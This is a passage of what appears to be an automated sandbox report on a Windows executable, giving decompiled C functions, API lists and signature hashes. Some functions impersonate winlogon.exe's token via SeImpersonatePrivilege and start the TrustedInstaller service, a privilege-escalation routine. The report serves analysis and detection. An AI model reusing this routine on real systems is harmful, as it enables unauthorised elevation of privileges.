                                                                                                                    • Instruction Fuzzy Hash: 3D519E71C50604DBCB20AFA4D9889AD77B4FB04710F60823BE861B72D2D7394D82CB9D
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00401AC9, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 105COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 80%
                                                                                                                    			E00401AC9(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, void* _a8, void* _a12, void* _a16) {
				long _v8;
				int _v12;
				intOrPtr _v16;
				int _v20;
				int _v24;
				char _v28;
				void _v538;
				char _v540;
				int _v548;
				char _v564;
				char _v22292;
				void* __edi;
				void* __esi;
				void* _t37;
				int _t43;
				int _t45;
				void* _t48;
				void* _t56;
				signed int _t57;
				long _t61;
				void* _t67;
				long _t69;
				void* _t70;
				void* _t72;
				void* _t74;
				void* _t76;

				_t67 = __edx;
				E0040B550(0x5714, __ecx);
				_t37 = OpenProcess(0x10, 0, _a16);
				_t82 = _t37;
				_a16 = _t37;
				if(_t37 == 0) {
					_t69 = GetLastError();
				} else {
					_t72 =  &_v22292;
					E0040171F(_t72, _t82);
					_v8 = 0;
					_t43 = ReadProcessMemory(_a16, _a8, _t72, 0x54f4,  &_v8); // executed
					if(_t43 == 0) {
						_t69 = GetLastError();
					} else {
						_t48 = E00405642( &_v564);
						_t74 = _v548;
						_t70 = _t48;
						_a12 = _t74;
						_v540 = 0;
						memset( &_v538, 0, 0x1fe);
						asm("cdq");
						_push(_t67);
						_push(_t74);
						_push(_t70);
						_push(L"%d  %I64x");
						_push(0xff);
						_push( &_v540);
						L0040B1EC();
						_v548 = 0;
						E004055D1( &_v540,  &_v564);
						_t16 = _t70 + 0xa; // 0xa
						_t68 = _t16;
						_v24 = 0;
						_v12 = 0;
						_v20 = 0;
						_v16 = 0x100;
						_v28 = 0;
						E0040559A( &_v28, _t16);
						_t76 = _v12;
						_t56 = 0x40c4e8;
						if(_t76 != 0) {
							_t56 = _t76;
						}
						_t26 = _t70 + 2; // 0x2
						_t66 = _t70 + _t26;
						_t57 = ReadProcessMemory(_a16, _a12, _t56, _t70 + _t26,  &_v8); // executed
						_t85 = _t76;
						if(_t76 == 0) {
							_t76 = 0x40c4e8;
						}
						E004055F9(_t57 | 0xffffffff,  &_v564, _t76);
						_t61 = E004022D5(_t66, _t68, _t85, _a4,  &_v22292); // executed
						_t69 = _t61;
						E004055D1(_t61,  &_v28);
					}
					_t45 = FindCloseChangeNotification(_a16); // executed
					E004055D1(_t45,  &_v564);
				}
				return _t69;
			}





























                                                                                                                    0x00401ac9
                                                                                                                    0x00401ad1
                                                                                                                    0x00401ae1
                                                                                                                    0x00401ae7
                                                                                                                    0x00401ae9
                                                                                                                    0x00401aec
                                                                                                                    0x00401c1b
                                                                                                                    0x00401af2
                                                                                                                    0x00401af2
                                                                                                                    0x00401af8
                                                                                                                    0x00401b0c
                                                                                                                    0x00401b12
                                                                                                                    0x00401b1a
                                                                                                                    0x00401bfd
                                                                                                                    0x00401b20
                                                                                                                    0x00401b26
                                                                                                                    0x00401b2b
                                                                                                                    0x00401b36
                                                                                                                    0x00401b40
                                                                                                                    0x00401b43
                                                                                                                    0x00401b4a
                                                                                                                    0x00401b54
                                                                                                                    0x00401b55
                                                                                                                    0x00401b56
                                                                                                                    0x00401b57
                                                                                                                    0x00401b58
                                                                                                                    0x00401b63
                                                                                                                    0x00401b68
                                                                                                                    0x00401b69
                                                                                                                    0x00401b77
                                                                                                                    0x00401b7d
                                                                                                                    0x00401b82
                                                                                                                    0x00401b82
                                                                                                                    0x00401b88
                                                                                                                    0x00401b8b
                                                                                                                    0x00401b8e
                                                                                                                    0x00401b91
                                                                                                                    0x00401b98
                                                                                                                    0x00401b9b
                                                                                                                    0x00401ba0
                                                                                                                    0x00401ba5
                                                                                                                    0x00401baa
                                                                                                                    0x00401bac
                                                                                                                    0x00401bac
                                                                                                                    0x00401bb2
                                                                                                                    0x00401bb2
                                                                                                                    0x00401bbe
                                                                                                                    0x00401bc4
                                                                                                                    0x00401bc6
                                                                                                                    0x00401bc8
                                                                                                                    0x00401bc8
                                                                                                                    0x00401bd7
                                                                                                                    0x00401be6
                                                                                                                    0x00401bee
                                                                                                                    0x00401bf0
                                                                                                                    0x00401bf0
                                                                                                                    0x00401c02
                                                                                                                    0x00401c0e
                                                                                                                    0x00401c0e
                                                                                                                    0x00401c23

                                                                                                                    APIs
                                                                                                                    • OpenProcess.KERNEL32(00000010,00000000,0040864F,00000000,?,00000000,?,0040864F,?,?,?,00000000), ref: 00401AE1
                                                                                                                    • ReadProcessMemory.KERNELBASE(0040864F,?,?,000054F4,00000000,?,0040864F,?,?,?,00000000), ref: 00401B12
                                                                                                                    • memset.MSVCRT ref: 00401B4A
                                                                                                                    • ReadProcessMemory.KERNELBASE(?,?,0040C4E8,00000002,00000000), ref: 00401BBE
                                                                                                                    • _snwprintf.MSVCRT ref: 00401B69
                                                                                                                      • Part of subcall function 004055D1: free.MSVCRT(?,00405843,00000000,?,00000000), ref: 004055DA
                                                                                                                      • Part of subcall function 0040559A: free.MSVCRT(?,00000000,?,004057E1,00000000,?,00000000), ref: 004055AA
                                                                                                                    • GetLastError.KERNEL32(?,0040864F,?,?,?,00000000), ref: 00401BF7
                                                                                                                    • FindCloseChangeNotification.KERNELBASE(0040864F,?,0040864F,?,?,?,00000000), ref: 00401C02
                                                                                                                    • GetLastError.KERNEL32(?,0040864F,?,?,?,00000000), ref: 00401C15
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000007.00000002.277375754.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000007.00000002.277368466.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277388528.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277400417.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277454544.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: Process$ErrorLastMemoryReadfree$ChangeCloseFindNotificationOpen_snwprintfmemset
                                                                                                                    • String ID: %d %I64x
                                                                                                                    • API String ID: 1126726007-2565891505
                                                                                                                    • Opcode ID: 0e39567e62c21eb8595adf136d2f138d4fded52a6135c8fa9db2ff03bc4b818b
                                                                                                                    • Instruction ID: f77edfd559f5df329b7cfb23e65bd27f477c8a0de7d8607e39e5f26d9e4a317c
                                                                                                                    • Opcode Fuzzy Hash: 0e39567e62c21eb8595adf136d2f138d4fded52a6135c8fa9db2ff03bc4b818b
                                                                                                                    • Instruction Fuzzy Hash: FE312A72900519EBDB10EF959C859EE7779EF44304F40057AF504B3291DB349E45CBA8
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00401F04, Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 74COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 90%
                                                                                                                    			E00401F04(void* __edx, intOrPtr _a4) {
				int _v8;
				void _v538;
				long _v540;
				void _v1066;
				char _v1068;
				long _t30;
				int _t33;
				int _t39;
				void* _t42;
				void* _t45;
				long _t49;

				_t45 = __edx;
				_v540 = 0;
				memset( &_v538, 0, 0x208);
				_v1068 = 0;
				memset( &_v1066, 0, 0x208);
				E00404C3C( &_v540);
				_t48 = L"winlogon.exe";
				_t39 = wcslen(L"winlogon.exe");
				_t8 = wcslen( &_v540) + 1; // 0x1
				_t53 = _t39 + _t8 - 0x104;
				_pop(_t42);
				if(_t39 + _t8 >= 0x104) {
					_v1068 = 0;
				} else {
					E00404BE4( &_v1068,  &_v540, _t48);
					_pop(_t42);
				}
				_v8 = 0;
				_t30 = E00401DF9(_t45, _t53, _a4,  &_v1068,  &_v8); // executed
				_t49 = _t30;
				_t54 = _t49;
				if(_t49 == 0) {
					E00408F48(_t42, _t54, L"SeImpersonatePrivilege"); // executed
					_t33 = ImpersonateLoggedOnUser(_v8); // executed
					if(_t33 == 0) {
						_t49 = GetLastError();
					}
					CloseHandle(_v8);
				}
				return _t49;
			}














                                                                                                                    0x00401f04
                                                                                                                    0x00401f20
                                                                                                                    0x00401f27
                                                                                                                    0x00401f38
                                                                                                                    0x00401f3f
                                                                                                                    0x00401f4e
                                                                                                                    0x00401f54
                                                                                                                    0x00401f5f
                                                                                                                    0x00401f6e
                                                                                                                    0x00401f72
                                                                                                                    0x00401f77
                                                                                                                    0x00401f78
                                                                                                                    0x00401f91
                                                                                                                    0x00401f7a
                                                                                                                    0x00401f88
                                                                                                                    0x00401f8e
                                                                                                                    0x00401f8e
                                                                                                                    0x00401fa6
                                                                                                                    0x00401fa9
                                                                                                                    0x00401fae
                                                                                                                    0x00401fb0
                                                                                                                    0x00401fb2
                                                                                                                    0x00401fb9
                                                                                                                    0x00401fc2
                                                                                                                    0x00401fca
                                                                                                                    0x00401fd2
                                                                                                                    0x00401fd2
                                                                                                                    0x00401fd7
                                                                                                                    0x00401fd7
                                                                                                                    0x00401fe3

                                                                                                                    APIs
                                                                                                                    • memset.MSVCRT ref: 00401F27
                                                                                                                    • memset.MSVCRT ref: 00401F3F
                                                                                                                      • Part of subcall function 00404C3C: GetSystemDirectoryW.KERNEL32(0041C6D0,00000104), ref: 00404C52
                                                                                                                      • Part of subcall function 00404C3C: wcscpy.MSVCRT ref: 00404C62
                                                                                                                    • wcslen.MSVCRT ref: 00401F5A
                                                                                                                    • wcslen.MSVCRT ref: 00401F69
                                                                                                                    • ImpersonateLoggedOnUser.KERNELBASE(?,0040218D,?,?,?,?,?,?,?,00000000), ref: 00401FC2
                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00401FCC
                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,?,?,00000000), ref: 00401FD7
                                                                                                                      • Part of subcall function 00404BE4: wcscpy.MSVCRT ref: 00404BEC
                                                                                                                      • Part of subcall function 00404BE4: wcscat.MSVCRT ref: 00404BFB
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000007.00000002.277375754.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000007.00000002.277368466.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277388528.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277400417.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277454544.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: memsetwcscpywcslen$CloseDirectoryErrorHandleImpersonateLastLoggedSystemUserwcscat
                                                                                                                    • String ID: SeImpersonatePrivilege$winlogon.exe
                                                                                                                    • API String ID: 3867304300-2177360481
                                                                                                                    • Opcode ID: b9815b26473cd7491ae288f5076cf4125b88922a7fa2441dfc3ee00491751d6f
                                                                                                                    • Instruction ID: dcc5dec8953379ec1552ef046485534b93905478987a0ec3c51696e6dc85d708
                                                                                                                    • Opcode Fuzzy Hash: b9815b26473cd7491ae288f5076cf4125b88922a7fa2441dfc3ee00491751d6f
                                                                                                                    • Instruction Fuzzy Hash: 48214F72940118AACB20A795DC899DFB7BCDF54354F5001BBF608F2191EB345A848BAC
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00401306, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 38serviceCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 100%
                                                                                                                    			E00401306(void* _a4) {
				intOrPtr _v28;
				struct _SERVICE_STATUS _v32;
				void* _t5;
				int _t12;
				void* _t14;

				_t12 = 0; // executed
				_t5 = OpenServiceW(_a4, L"TrustedInstaller", 0x34); // executed
				_t14 = _t5;
				if(_t14 != 0) {
					if(QueryServiceStatus(_t14,  &_v32) != 0 && _v28 != 4) {
						_t12 = StartServiceW(_t14, 0, 0);
					}
					CloseServiceHandle(_t14);
				}
				CloseServiceHandle(_a4);
				return _t12;
			}








                                                                                                                    0x00401319
                                                                                                                    0x0040131b
                                                                                                                    0x00401327
                                                                                                                    0x0040132b
                                                                                                                    0x0040133a
                                                                                                                    0x0040134b
                                                                                                                    0x0040134b
                                                                                                                    0x0040134e
                                                                                                                    0x0040134e
                                                                                                                    0x00401353
                                                                                                                    0x0040135b

                                                                                                                    APIs
                                                                                                                    • OpenServiceW.ADVAPI32(00402183,TrustedInstaller,00000034,?,?,00000000,?,?,?,?,?,00402183,00000000), ref: 0040131B
                                                                                                                    • QueryServiceStatus.ADVAPI32(00000000,?,?,?,?,?,?,00402183,00000000), ref: 00401332
                                                                                                                    • StartServiceW.ADVAPI32(00000000,00000000,00000000), ref: 00401345
                                                                                                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,00402183,00000000), ref: 0040134E
                                                                                                                    • CloseServiceHandle.ADVAPI32(00402183,?,?,?,?,?,00402183,00000000), ref: 00401353
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000007.00000002.277375754.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000007.00000002.277368466.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277388528.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277400417.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277454544.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: Service$CloseHandle$OpenQueryStartStatus
                                                                                                                    • String ID: TrustedInstaller
                                                                                                                    • API String ID: 862991418-565535830
                                                                                                                    • Opcode ID: e275db5ffe703eced9a7585420ea8a7e70def606d9c8162886671e7be63d83f8
                                                                                                                    • Instruction ID: 300c39592a487ff017dde1f9aaf4b69bffecac74e3568357a1b40912e0f2caec
                                                                                                                    • Opcode Fuzzy Hash: e275db5ffe703eced9a7585420ea8a7e70def606d9c8162886671e7be63d83f8
                                                                                                                    • Instruction Fuzzy Hash: F9F08275601218FBE7222BE59CC8DAF7A6CDF88794B040132FD01B12A0D674DD05C9F9
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00409555, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloadertimeCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 100%
                                                                                                                    			E00409555(void* _a4, struct _FILETIME* _a8, struct _FILETIME* _a12, struct _FILETIME* _a16, struct _FILETIME* _a20) {
				int _t8;
				struct HINSTANCE__* _t9;

				if( *0x41c8e8 == 0) {
					_t9 = GetModuleHandleW(L"kernel32.dll");
					if(_t9 != 0) {
						 *0x41c8e8 = 1;
						 *0x41c8ec = GetProcAddress(_t9, "GetProcessTimes");
					}
				}
				if( *0x41c8ec == 0) {
					return 0;
				} else {
					_t8 = GetProcessTimes(_a4, _a8, _a12, _a16, _a20); // executed
					return _t8;
				}
			}





                                                                                                                    0x0040955f
                                                                                                                    0x00409566
                                                                                                                    0x0040956e
                                                                                                                    0x00409576
                                                                                                                    0x00409586
                                                                                                                    0x00409586
                                                                                                                    0x0040956e
                                                                                                                    0x00409592
                                                                                                                    0x004095aa
                                                                                                                    0x00409594
                                                                                                                    0x004095a3
                                                                                                                    0x004095a6
                                                                                                                    0x004095a6

                                                                                                                    APIs
                                                                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,?,00409764,00000000,?,?,?,00401DD3,00000000,?), ref: 00409566
                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetProcessTimes), ref: 00409580
                                                                                                                    • GetProcessTimes.KERNELBASE(00000000,00401DD3,?,?,?,?,00409764,00000000,?,?,?,00401DD3,00000000,?), ref: 004095A3
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000007.00000002.277375754.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000007.00000002.277368466.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277388528.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277400417.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277454544.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressHandleModuleProcProcessTimes
                                                                                                                    • String ID: GetProcessTimes$kernel32.dll
                                                                                                                    • API String ID: 1714573020-3385500049
                                                                                                                    • Opcode ID: 7c908c3a013f4f9010f7eee84109228e73c5ea75ed64b39a480063120f72be39
                                                                                                                    • Instruction ID: 684c615278f70e6dc9f1b796aa494e436c9634249af5aea594c4fe29f2bd0140
                                                                                                                    • Opcode Fuzzy Hash: 7c908c3a013f4f9010f7eee84109228e73c5ea75ed64b39a480063120f72be39
                                                                                                                    • Instruction Fuzzy Hash: 51F0C031680209EFDF019FE5ED85B9A3BE9EB44705F008535F908E12A1D7758960EB58
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0040A33B, Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 100%
                                                                                                                    			E0040A33B(unsigned int _a4, WCHAR* _a8, WCHAR* _a12) {
				struct HRSRC__* _t12;
				void* _t16;
				void* _t17;
				signed int _t18;
				signed int _t26;
				signed int _t29;
				signed int _t33;
				struct HRSRC__* _t35;
				signed int _t36;

				_t12 = FindResourceW(_a4, _a12, _a8); // executed
				_t35 = _t12;
				if(_t35 != 0) {
					_t33 = SizeofResource(_a4, _t35);
					if(_t33 > 0) {
						_t16 = LoadResource(_a4, _t35);
						if(_t16 != 0) {
							_t17 = LockResource(_t16);
							if(_t17 != 0) {
								_a4 = _t33;
								_t29 = _t33 * _t33;
								_t36 = 0;
								_t7 =  &_a4;
								 *_t7 = _a4 >> 2;
								if( *_t7 != 0) {
									do {
										_t26 =  *(_t17 + _t36 * 4) * _t36 * _t33 * 0x00000011 ^  *(_t17 + _t36 * 4) + _t29;
										_t36 = _t36 + 1;
										_t29 = _t26;
									} while (_t36 < _a4);
								}
								_t18 =  *0x40fa70; // 0xfcb617dc
								 *0x40fa70 = _t18 + _t29 ^ _t33;
							}
						}
					}
				}
				return 1;
			}












                                                                                                                    0x0040a348
                                                                                                                    0x0040a34e
                                                                                                                    0x0040a352
                                                                                                                    0x0040a35f
                                                                                                                    0x0040a363
                                                                                                                    0x0040a369
                                                                                                                    0x0040a371
                                                                                                                    0x0040a374
                                                                                                                    0x0040a37c
                                                                                                                    0x0040a380
                                                                                                                    0x0040a383
                                                                                                                    0x0040a386
                                                                                                                    0x0040a388
                                                                                                                    0x0040a388
                                                                                                                    0x0040a38c
                                                                                                                    0x0040a38f
                                                                                                                    0x0040a39f
                                                                                                                    0x0040a3a1
                                                                                                                    0x0040a3a5
                                                                                                                    0x0040a3a5
                                                                                                                    0x0040a3a9
                                                                                                                    0x0040a3aa
                                                                                                                    0x0040a3b3
                                                                                                                    0x0040a3b3
                                                                                                                    0x0040a37c
                                                                                                                    0x0040a371
                                                                                                                    0x0040a3b8
                                                                                                                    0x0040a3be

                                                                                                                    APIs
                                                                                                                    • FindResourceW.KERNELBASE(?,?,?), ref: 0040A348
                                                                                                                    • SizeofResource.KERNEL32(?,00000000), ref: 0040A359
                                                                                                                    • LoadResource.KERNEL32(?,00000000), ref: 0040A369
                                                                                                                    • LockResource.KERNEL32(00000000), ref: 0040A374
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000007.00000002.277375754.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000007.00000002.277368466.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277388528.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277400417.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277454544.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: Resource$FindLoadLockSizeof
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3473537107-0
                                                                                                                    • Opcode ID: 92957de205b1cf6ef3f394a564c4f395d7934c53f24f2b06f4a74fbc6cc11166
                                                                                                                    • Instruction ID: cffa73b79ff672a66ed03b266e9253c2cf49bd0e4e2f0a3a12bdb4b298abf715
                                                                                                                    • Opcode Fuzzy Hash: 92957de205b1cf6ef3f394a564c4f395d7934c53f24f2b06f4a74fbc6cc11166
                                                                                                                    • Instruction Fuzzy Hash: 1101C032700315ABCB194FA5DD8995BBFAEFB852913088036ED09EA2A1D730C811CA88
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00404951, Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 38COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 100%
                                                                                                                    			E00404951(signed int* __eax, void* __edx, void** __edi, signed int _a4, char _a8) {
				void* _t8;
				void* _t13;
				signed int _t16;
				void** _t21;
				signed int _t22;

				_t21 = __edi;
				_t22 =  *__eax;
				if(__edx < _t22) {
					return 0;
				} else {
					_t13 =  *__edi;
					do {
						_t1 =  &_a8; // 0x4057e1
						 *__eax =  *__eax +  *_t1;
						_t16 =  *__eax;
					} while (__edx >= _t16);
					_t8 = malloc(_t16 * _a4); // executed
					 *__edi = _t8;
					if(_t22 > 0) {
						if(_t8 != 0) {
							memcpy(_t8, _t13, _t22 * _a4);
						}
						free(_t13); // executed
					}
					return 0 |  *_t21 != 0x00000000;
				}
			}








                                                                                                                    0x00404951
                                                                                                                    0x00404952
                                                                                                                    0x00404956
                                                                                                                    0x004049a1
                                                                                                                    0x00404958
                                                                                                                    0x00404959
                                                                                                                    0x0040495b
                                                                                                                    0x0040495b
                                                                                                                    0x0040495f
                                                                                                                    0x00404961
                                                                                                                    0x00404963
                                                                                                                    0x0040496d
                                                                                                                    0x00404975
                                                                                                                    0x00404977
                                                                                                                    0x0040497b
                                                                                                                    0x00404985
                                                                                                                    0x0040498a
                                                                                                                    0x0040498e
                                                                                                                    0x00404993
                                                                                                                    0x0040499d
                                                                                                                    0x0040499d

                                                                                                                    APIs
                                                                                                                    • malloc.MSVCRT ref: 0040496D
                                                                                                                    • memcpy.MSVCRT ref: 00404985
                                                                                                                    • free.MSVCRT(00000000,00000000,?,004055BF,00000002,?,00000000,?,004057E1,00000000,?,00000000), ref: 0040498E
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000007.00000002.277375754.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000007.00000002.277368466.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277388528.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277400417.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277454544.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: freemallocmemcpy
                                                                                                                    • String ID: W@
                                                                                                                    • API String ID: 3056473165-1729568415
                                                                                                                    • Opcode ID: 333fb239f4ff1cdabd0487bf4b3bf6bf98c6d246a46385af68035416a7f8f3c9
                                                                                                                    • Instruction ID: 6576f77cd119d718dc8f29c334e0549a7190cc93a29033006f08a56aa9c3ab10
                                                                                                                    • Opcode Fuzzy Hash: 333fb239f4ff1cdabd0487bf4b3bf6bf98c6d246a46385af68035416a7f8f3c9
                                                                                                                    • Instruction Fuzzy Hash: 09F054B26092229FC708AA79B98585BB79DEF84364711487EF514E72D1D7389C40C7A8
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00405436, Relevance: 6.0, APIs: 4, Instructions: 31libraryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 100%
                                                                                                                    			E00405436(wchar_t* _a4) {
				void _v2050;
				signed short _v2052;
				void* __esi;
				struct HINSTANCE__* _t16;
				WCHAR* _t18;

				_v2052 = _v2052 & 0x00000000;
				memset( &_v2050, 0, 0x7fe);
				E00404C3C( &_v2052);
				_t18 =  &_v2052;
				E004047AF(_t18);
				wcscat(_t18, _a4);
				_t16 = LoadLibraryW(_t18); // executed
				if(_t16 == 0) {
					return LoadLibraryW(_a4);
				}
				return _t16;
			}








                                                                                                                    0x0040543f
                                                                                                                    0x00405456
                                                                                                                    0x00405462
                                                                                                                    0x00405467
                                                                                                                    0x0040546d
                                                                                                                    0x00405478
                                                                                                                    0x00405489
                                                                                                                    0x0040548d
                                                                                                                    0x00000000
                                                                                                                    0x00405492
                                                                                                                    0x00405496

                                                                                                                    APIs
                                                                                                                    • memset.MSVCRT ref: 00405456
                                                                                                                      • Part of subcall function 00404C3C: GetSystemDirectoryW.KERNEL32(0041C6D0,00000104), ref: 00404C52
                                                                                                                      • Part of subcall function 00404C3C: wcscpy.MSVCRT ref: 00404C62
                                                                                                                      • Part of subcall function 004047AF: wcslen.MSVCRT ref: 004047B0
                                                                                                                      • Part of subcall function 004047AF: wcscat.MSVCRT ref: 004047C8
                                                                                                                    • wcscat.MSVCRT ref: 00405478
                                                                                                                    • LoadLibraryW.KERNELBASE(00000000), ref: 00405489
                                                                                                                    • LoadLibraryW.KERNEL32(?), ref: 00405492
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000007.00000002.277375754.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000007.00000002.277368466.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277388528.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277400417.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277454544.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: LibraryLoadwcscat$DirectorySystemmemsetwcscpywcslen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3725422290-0
                                                                                                                    • Opcode ID: 1802a75fbf0d54ac87396d762f51419468a1e880665e67f03dd367b63fba9ca4
                                                                                                                    • Instruction ID: bb87c58107a7235a9df1b9b02ada5b91fca9717c482d10a691b94706fbe65826
                                                                                                                    • Opcode Fuzzy Hash: 1802a75fbf0d54ac87396d762f51419468a1e880665e67f03dd367b63fba9ca4
                                                                                                                    • Instruction Fuzzy Hash: EBF03771D40229A6DF20B7A5CC06B8A7A6CFF40758F0044B6B94CB7191DB7CEA558FD8
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 004056B5, Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 136COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 100%
                                                                                                                    			E004056B5(signed int __ecx, void* __eflags, signed int* _a4, signed short* _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed short* _v28;
				signed int _v32;
				signed int _v36;
				intOrPtr _v40;
				signed int _v44;
				signed int _v48;
				char _v52;
				void* __edi;
				void* __esi;
				signed short* _t68;
				signed short _t72;
				intOrPtr _t80;
				void* _t82;
				void* _t85;
				intOrPtr _t90;
				signed int _t101;
				intOrPtr _t102;
				void** _t104;
				signed short* _t106;
				signed int* _t107;
				signed int _t110;

				_t94 = __ecx;
				_t101 = 0;
				_v32 = 0x22;
				_v16 = 0;
				_v20 = 0;
				_v12 = 0;
				_v24 = 1;
				_v8 = 0;
				_v48 = 0;
				_v36 = 0;
				_v44 = 0;
				_v40 = 0x100;
				_v52 = 0;
				_t68 = E004054B9(_a4);
				_t106 = _a8;
				if( *_t106 == 0) {
					L31:
					_t107 = _a4;
					L32:
					_t102 =  *((intOrPtr*)(_t107 + 0x1c));
					 *((intOrPtr*)(_t107 + 0x30)) = _t102;
					E004055D1(_t68,  &_v52);
					return _t102;
				}
				_v28 = _t106;
				do {
					_t72 =  *_v28 & 0x0000ffff;
					if(_t72 != 0x20 || _v8 != 0) {
						if(_t72 == 0x22 || _t72 == 0x27) {
							if(_v8 != 0) {
								if(_t72 != _v32) {
									goto L14;
								}
								_v8 = _v8 ^ 0x00000001;
								goto L25;
							}
							_v32 = _t72 & 0x0000ffff;
							_v8 = 1;
							goto L25;
						} else {
							L14:
							if(_t101 != 0) {
								L24:
								E0040559A( &_v52, _t101);
								 *((short*)(_v36 + _t101 * 2)) =  *_v28 & 0x0000ffff;
								_t106 = _a8;
								_t101 = _t101 + 1;
								_v12 = _t101;
								L25:
								_v24 = 0;
								goto L26;
							}
							if(_t72 == 0x20) {
								goto L25;
							}
							_t104 = _a4 + 0x20;
							if(_v16 >= 0) {
								_t110 = _v16;
								_t82 = _t104[2];
								if(_t110 != 0xffffffff) {
									E00404951( &(_t104[1]), _t110, _t104, 4, _t82);
								} else {
									free( *_t104);
								}
								_t85 = _t110 + 1;
								if(_t104[3] < _t85) {
									_t104[3] = _t85;
								}
								_t94 = _v20;
								 *((intOrPtr*)( *_t104 + _t110 * 4)) = _v20;
							}
							_t101 = _v12;
							goto L24;
						}
					} else {
						if(_v24 == 0) {
							E0040559A( &_v52, _t101);
							_t90 = _v36;
